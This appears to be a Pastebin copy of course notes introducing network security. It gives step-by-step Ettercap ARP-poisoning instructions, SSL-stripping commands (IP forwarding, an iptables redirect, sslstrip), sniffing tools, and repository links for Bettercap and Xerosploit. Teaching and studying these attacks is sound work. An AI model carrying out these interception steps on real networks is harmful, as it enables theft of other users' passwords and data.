Advertisement
Mukezh

NETWORK SECURITY

Nov 26th, 2018
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.92 KB | None | 0 0
  1. SESSION 18
  2. ==========
  3.  
  4. INTRODUCTION TO NETWORK SECURITY
  5. ================================
  6.  
  7. Nowadays we get Free Wi-Fi and Networks at Social Gathering Places. For eg. McDonalds, Indian Railways, Airport etc.
  8.  
  9. We get free WiFis but the data is insecure over there. Any malicious person sitting in the network can monitor and watch each and every data which is being sent in the network.
  10. These type of attacks cannot be detected by anyone.
  11.  
  12. Disadvantages of Free WIFI
  13. ==========================
  14. = Cyber Terrorism Activities can be done using some Free WIFI.
  15. = DDOS can be done through all the Clients connected through the Free WIFI.
  16. = Unauthorized users like hackers can easily intercept your data by MITM.
  17. = Attackers can spread Viruses, worms, and Trojan horses in the whole network.
  18. = Data interception and theft and Identity theft etc.
  19.  
  20.  
  21. MITM
  22. =====
  23. MITM stands for Man In The Middle Attack, in which an Intruder is sitting inside the network, and can watch and alter the data. And hence, can gather the credential information of the other users sitting inside the network.
  24. For performing the attack we need to know the IP Address of the target. For getting the IP Address of the target, we use some tools for reconaissance.
  25.  
  26. Tools
  27. ======
  28.  
  29. Tool for MITM :
  30.  
  31. = Ettercap : Linux based tool, which is used to perform multiple MITM attacks like ARP Poisoning, DNS Poisoning etc.
  32.  
  33. ARP POISONING ATTACK - ARP Poisoning is a type of cyber attack carried out over a LAN that involves sending malicious ARP packets to a default gateway on a LAN to spoof the IP to MAC address table. ARP Protocol translates IP addresses into MAC addresses.
  34.  
  35. STEPS
  36. =====
  37.  
  38. ARP POISONING
  39. ==============
  40. = ettercap -G (-G for Graphical version)
  41. = Click on "sniff" further "Uniffied sniffing"
  42. = Select the interface
  43. = Go to Hosts and "Scan for hosts" for scanning all the hosts of the Network.
  44. = Hosts > "Host List"
  45. = Check for the Default Gateway(Router's IP) by "route -n"
  46. = Select the Gateway as "Add to Target 1"
  47. = Select the Target Machine as "Add to Target 2"
  48. = Further proceed to MITM and click on "ARP Poisioning"
  49. = Click on "Sniff Remote Connection"
  50. = Go to MITM and click on "ARP Poisoning" (Address Resolution Protocol)
  51. = Click on "Start Sniffing"
  52.  
  53. But the limitation was it was only performing on HTTP Websites.
  54.  
  55. For performing MITM on HTTPS with SSL Stripping
  56. ===============================================
  57.  
  58. SSLStrip is a type of MITM attack that forces a victim's browser into communicating with an adversary in plain-text over HTTP, and the adversary proxies the modified content from an HTTPS server.
  59. In short we convert the HTTPS website into HTTP, which means we can even watch the passwords of HTTPS websites.
  60.  
  61. Steps
  62. =====
  63. terminal > echo "1" > /proc/sys/net/ipv4/ip_forward
  64. terminal > nano /etc/ettercap/etter.conf
  65. = Find iptables in the conf file > copy and apply as given in the next step.
  66. terminal > iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
  67. terminal > sslstrip -l 8080
  68.  
  69. DNS Poisioning or DNS spoofing, is a form of computer security hacking iwhich is behaving like a Man in the Middle, which corrupt Domain Name System data is spoofed by Attacker and further intercepts the data.
  70.  
  71.  
  72.  
  73. For Getting the Images :
  74. > TERMINAL : driftnet
  75.  
  76. For Getting the URL :
  77. > TERMINAL : urlsnarf
  78.  
  79. ------------------------------------------------------------------------------------------
  80.  
  81. Another Tool for MITM - Bettercap and Xerosploit
  82. =================================================
  83.  
  84. Bettercap V1. - git clone https://github.com/evilsocket/bettercap
  85. Xerosploit - git clone https://github.com/LionSec/xerosploit
  86.  
  87. ------------------------------------------------------------------------------------------
  88.  
  89. ---------------------------------------------------------------------
  90.  
  91. Xerosploit - Use replace for changing the images.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement